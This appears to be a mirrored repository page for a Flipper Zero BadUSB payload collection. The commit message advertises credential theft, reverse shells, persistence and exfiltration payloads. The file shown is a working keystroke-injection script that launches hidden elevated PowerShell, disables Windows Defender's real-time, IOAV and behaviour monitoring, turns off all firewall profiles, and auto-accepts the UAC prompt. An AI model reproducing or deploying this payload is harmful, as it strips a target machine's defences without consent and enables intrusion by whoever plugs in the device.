mirror of
https://github.com/UberGuidoZ/Flipper.git
synced 2026-09-17 15:23:14 +00:00
Added 25 BadUSB payloads for Flipper Zero: - System reconnaissance (Windows/Linux/Mac) - Credential extraction & WiFi password stealing - Reverse shells (PowerShell & Bash) - Defense evasion & persistence - Data exfiltration (keylogger, webcam, clipboard) - Harmless pranks All payloads include proper headers and documentation. Cross-platform support for Windows, Linux, and macOS.
14 lines
542 B
Plaintext
14 lines
542 B
Plaintext
REM ========================================
|
|
REM NullSec Flipper Zero BadUSB
|
|
REM Payload: Disable Windows Defender
|
|
REM Target: Windows 10/11
|
|
REM ========================================
|
|
DELAY 1000
|
|
GUI r
|
|
DELAY 500
|
|
STRING powershell -w hidden Start-Process powershell -Verb runAs -ArgumentList '-w hidden -ep bypass -c "Set-MpPreference -DisableRealtimeMonitoring $true; Set-MpPreference -DisableIOAVProtection $true; Set-MpPreference -DisableBehaviorMonitoring $true; netsh advfirewall set allprofiles state off"'
|
|
ENTER
|
|
DELAY 2000
|
|
ALT y
|
|
ENTER
|